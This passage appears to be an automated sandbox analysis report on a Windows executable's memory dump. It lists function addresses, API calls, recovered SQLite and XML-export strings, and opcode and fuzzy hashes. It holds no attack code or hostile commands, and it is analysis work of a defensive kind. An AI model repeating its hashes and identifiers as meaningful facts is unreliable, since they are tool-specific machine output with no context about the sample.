                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                • API String ID: 2012295524-4050573280
                                                                                                                                                                • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                                • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                                • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                                • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                                • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                                • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                                • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1973883786-0
                                                                                                                                                                • Opcode ID: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                                                                                                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                • Opcode Fuzzy Hash: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                                                                                                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                                • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004185FC
                                                                                                                                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@AttributesFilememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776155459-0
                                                                                                                                                                • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2308052813-0
                                                                                                                                                                • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PathTemp$??3@
                                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                • API String ID: 1589464350-1420421710
                                                                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                                • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                • String ID: General
                                                                                                                                                                • API String ID: 999786162-26480598
                                                                                                                                                                • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                                • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                • API String ID: 0-1953309616
                                                                                                                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: gj
                                                                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                                                                • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
